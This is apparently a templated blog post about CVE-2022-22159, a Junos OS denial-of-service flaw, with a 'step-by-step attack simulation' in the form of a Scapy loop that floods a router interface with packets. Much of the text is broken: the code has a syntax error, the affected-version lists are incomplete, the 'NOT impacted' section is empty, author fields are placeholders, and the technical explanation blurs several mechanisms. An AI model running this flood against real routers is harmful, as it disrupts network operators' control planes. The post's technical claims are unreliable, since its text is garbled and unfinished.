In early 2022, researchers uncovered CVE-2022-22159, a Denial of Service (DoS) vulnerability that affected Juniper Networks’ Junos OS kernel. This vulnerability lives in the way the NETISR network queue operates, and attackers can exploit it simply by sending crafted–but otherwise valid–IPv4 unicast packets to a vulnerable router. If you run any of the affected Junos versions, your rpd process may spike to 100% CPU, potentially cutting off your control plane without affecting traffic forwarding by distributed FPC CPUs.
This post covers what CVE-2022-22159 is, how it’s abused, which versions are at risk, indicators of compromise, how to observe NETISR drops, and includes a step-by-step attack simulation for security researchers.
What is NETISR and Why is It Important?
NETISR (Network Interrupt Service Routine) is a network software queue used by Junos OS and FreeBSD to handle various types of network traffic asynchronously. If, for some reason, this queue starts to grow uncontrollably, kernel threads and system daemons start consuming excessive CPU — leading to a partial or complete denial of service.
Product: Juniper Networks Junos OS
- Danger: Remote Denial of Service (DoS) by authenticated/unprivileged user or attacker who can send traffic to a router interface
- CVSS Score: Refer here for scoring
Juniper's Advisory:
The vulnerability is caused when specifically-crafted IPv4 unicast packets traverse a router that is using equal-cost multi-path (ECMP) unilist selection. When these packets are processed, the routing protocol daemon (rpd) CPU can reach close to 100%. Forwarding engines continue, but management (routing updates, new sessions, adjustments) stalls — sustaining a DoS situation.
19.1R3-S3 and later before 19.1R3-S7
NOT impacted:
Exploit: How Does the Attack Work?
The attacker does not need any special access or to exploit authentication flaws—anyone who can send IPv4 packets to the router’s interface that participates in ECMP unicast routing can trigger this bug.
The attack involves repetitively sending regular packets that force the router’s NETISR queue to fill, causing the routing protocol daemon (rpd) to peg the control plane CPU.
Destination: A route in your ECMP (Unicast) pool
- Packet can be TCP/UDP/ICMP, etc.
Example Packet with Scapy
Here is Python code using Scapy that can be run from a remote Linux host (replace ROUTER_IP and ROUTABLE_IP accordingly):
from scapy.all import *
dst_ip = 'ROUTER_IP' # Target router interface IP (in ECMP)
src_ip = 'ROUTABLE_IP' # Any routable source IP
pkt = IP(src=src_ip, dst=dst_ip) / ICMP()
while True:
send(pkt, verbose=)
Send this script from enough sources or with enough bandwidth, and you’ll gradually peg rpd CPU. The trick is to hit the ECMP unicast path; packet content (e.g., ICMP, TCP syn, etc.) may not matter as long as it matches a route that triggers ECMP forwarding.
Routing updates, configuration changes stall or fail
- FPC (Forwarding) CPUs keep passing traffic, but new session setups or BGP/OSPF changes don't process
- Many NETISR drops visible in the system
show system queues
Look for netisr or kernel queue drops above normal.
General unresponsiveness to management actions.
If you see these signs, call Juniper JTAC:
They can provide advanced diagnostics and suggestions.
Fixes, Patches, and Mitigation
Patches:
Junos OS SIRT notification JSA11287 - CVE-2022-22159
Links & References
1. Juniper Security Advisory JSA11287
2. NIST NVD Report for CVE-2022-22159
3. Juniper JTAC Support
4. Scapy project
Conclusion
CVE-2022-22159 is an excellent example of how a software queue implementation flaw can cripple a router’s brain — the control plane — without even touching the data plane. Anyone running affected Junos OS versions must upgrade or apply controls immediately. While the forwarding CPU and ongoing sessions are not interrupted at first, a stuck control plane is a ticking time bomb for enterprise operations.
*If you suspect you are being targeted, act fast: check system queues, block offending flows, and engage JTAC for diagnostics. Keep your systems patched to prevent easy DoS wins for attackers.*
*Author: [Your Name] — For exclusive research and simple explanations like this, follow more posts here.*
##### This article is written exclusively for [your site/name]. Do not distribute without permission.
Timeline
Published on: 01/19/2022 01:15:00 UTC
Last modified on: 01/31/2022 18:17:00 UTC